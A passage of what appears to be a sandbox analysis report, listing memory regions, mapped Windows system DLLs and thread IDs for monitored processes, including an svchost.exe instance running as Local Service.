"tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 3734 start_va = 0x1e00000 end_va = 0x1e7afff monitored = 0 entry_point = 0x1e5385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 3735 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3736 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3740 start_va = 0x1e00000 end_va = 0x1ebffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3741 start_va = 0x190000 end_va = 0x191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4592 start_va = 0x2350000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 4593 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4609 start_va = 0x7fef7700000 end_va = 0x7fef770dfff monitored = 0 entry_point = 0x7fef7705d28 region_type = mapped_file name = "dimsjob.dll" filename = "\\Windows\\System32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll") Region: id = 4610 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4627 start_va = 0x7fefb4f0000 end_va = 0x7fefb616fff monitored = 0 entry_point = 0x7fefb4f10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4628 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4629 start_va = 0x7fef94b0000 end_va = 0x7fef9523fff monitored = 0 entry_point = 0x7fef94b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4630 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4631 start_va = 0x7fefb690000 end_va = 0x7fefb6a4fff monitored = 0 entry_point = 0x7fefb6960d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4632 start_va = 0x23d0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 4633 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4634 start_va = 0x1f70000 end_va = 0x1fb4fff monitored = 0 entry_point = 0x1f71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4635 start_va = 0x1f70000 end_va = 0x1fb4fff monitored = 0 entry_point = 0x1f71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4636 start_va = 0x1f70000 end_va = 0x1fb4fff monitored = 0 entry_point = 0x1f71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4637 start_va = 0x1f70000 end_va = 0x1fb4fff monitored = 0 entry_point = 0x1f71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4638 start_va = 0x1f70000 end_va = 0x1fb4fff monitored = 0 entry_point = 0x1f71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4639 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4640 start_va = 0x25c0000 end_va = 0x288efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4644 start_va = 0x2400000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 4645 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 4646 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4698 start_va = 0x7fef7350000 end_va = 0x7fef735bfff monitored = 0 entry_point = 0x7fef735602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4956 start_va = 0x7fef6e90000 end_va = 0x7fef6ecafff monitored = 0 entry_point = 0x7fef6e922f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 4973 start_va = 0x1a0000 end_va = 0x1a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winmm.dll.mui" filename = "\\Windows\\System32\\en-US\\winmm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winmm.dll.mui") Thread: id = 404 os_tid = 0x450 Thread: id = 411 os_tid = 0x46c Thread: id = 413 os_tid = 0x474 Thread: id = 415 os_tid = 0x480 Thread: id = 417 os_tid = 0x488 Thread: id = 418 os_tid = 0x48c Thread: id = 422 os_tid = 0x49c Thread: id = 423 os_tid = 0x4a0 Thread: id = 427 os_tid = 0x4b0 Thread: id = 428 os_tid = 0x4b4 Thread: id = 429 os_tid = 0x4b8 Thread: id = 510 os_tid = 0x648 Thread: id = 517 os_tid = 0x65c Thread: id = 555 os_tid = 0x70c Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1715a000" os_pid = "0x478" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001210e" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Region: id = 3579 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3580 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3581 start_va = 0x130000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 3582 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3583 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3584 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3585 start_va = 0xffce0000 end_va = 0xffceafff monitored = 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3586 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3587 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3588 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3589 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3590 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3595 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3596 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3597 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3598 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3599 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3600 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3601 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3602 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3603 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3604 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3605 start_va = 0x430000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3606 start_va = 0x1b0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3607 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3608 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3609 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3610 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3613 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3614 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3615 start_va = 0x430000 end_va = 0x5b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3616 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3617 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3618 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3619 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3620 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3621 start_va = 0x7a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 3622 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 3623 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3624 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3627 start_va = 0x2b0000 end_va = 0x32cfff monitored = 0 entry_point = 0x2bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3628 start_va = 0x2b0000 end_va = 0x32cfff monitored = 0 entry_point = 0x2bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3629 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3640 start_va = 0x8f0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 3641 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3642 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3643 start_va = 0xb00000 end_va = 0xb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 3644 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3646 start_va = 0xb90000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 3647 start_va = 0xc40000 end_va = 0xcbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 3648 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3649 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3650 start_va = 0xcc0000 end_va = 0xf8efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3653 start_va = 0x7fefad00000 end_va = 0x7fefadaffff monitored = 0 entry_point = 0x7fefad128b0 region_type = mapped_file name = "bfe.dll" filename = "\\Windows\\System32\\BFE.DLL" (normalized: "c:\\windows\\system32\\bfe.dll") Region: id = 3658 start_va = 0x7fefd420000 end_va = 0x7fefd44efff monitored = 0 entry_point = 0x7fefd421064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 3659 start_va = 0x7fefb460000 end_va = 0x7fefb46afff monitored = 0 entry_point = 0x7fefb464f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3663 start_va = 0x970000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 3664 start_va = 0xe0000 end_va = 0xe6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bfe.dll.mui" filename = "\\Windows\\System32\\en-US\\bfe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\bfe.dll.mui") Region: id = 3665 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3666 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3667 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3717 start_va = 0x7fefcc10000 end_va = 0x7fefcc1cfff monitored = 0 entry_point = 0x7fefcc11348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 3718 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3742 start_va = 0xa60000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 3743 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3748 start_va = 0x11f0000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3749 start_va = 0x7fefabc0000 end_va = 0x7fefac8dfff monitored = 0 entry_point = 0x7fefabc1e18 region_type = mapped_file name = "mpssvc.dll" filename = "\\Windows\\System32\\MPSSVC.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll") Region: id = 3750 start_va = 0x7fefb250000 end_va = 0x7fefb2a2fff monitored = 0 entry_point = 0x7fefb252b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3751 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3752 start_va = 0x7fefca90000 end_va = 0x7fefcb4afff monitored = 0 entry_point = 0x7fefca96de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3753 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3754 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3755 start_va = 0x1270000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 3756 start_va = 0x1280000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 3757 start_va = 0x1410000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 3758 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3759 start_va = 0xf0000 end_va = 0x10bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 3760 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3761 start_va = 0xc20000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 3762 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3771 start_va = 0x11b0000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 3772 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3773 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3774 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3775 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3776 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3777 start_va = 0x1370000 end_va = 0x13effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 3778 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3780 start_va = 0x7fefcc70000 end_va = 0x7fefcc8dfff monitored = 0 entry_point = 0x7fefcc713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3781 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3782 start_va = 0x7fefcc50000 end_va = 0x7fefcc6afff monitored = 0 entry_point = 0x7fefcc52068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3783 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3784 start_va = 0x7fefb3b0000 end_va = 0x7fefb3d6fff monitored = 0 entry_point = 0x7fefb3b98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3785 start_va = 0x7fefb3a0000 end_va = 0x7fefb3aafff monitored = 0 entry_point = 0x7fefb3a1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3786 start_va = 0x7fefb140000 end_va = 0x7fefb150fff monitored = 0 entry_point = 0x7fefb1416ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3787 start_va = 0x7fefb0c0000 end_va = 0x7fefb0d7fff monitored = 0 entry_point = 0x7fefb0c1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3788 start_va = 0x7fefd150000 end_va = 0x7fefd1a4fff monitored = 0 entry_point = 0x7fefd151054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3789 start_va = 0x7fefcb50000 end_va = 0x7fefcb56fff monitored = 0 entry_point = 0x7fefcb514b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3790 start_va = 0x7fefd140000 end_va = 0x7fefd146fff monitored = 0 entry_point = 0x7fefd14142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3796 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 3797 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3803 start_va = 0x15d0000 end_va = 0x164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 3804 start_va = 0x16e0000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" filename = "" Region: id = 3805 start_va = 0x17f0000 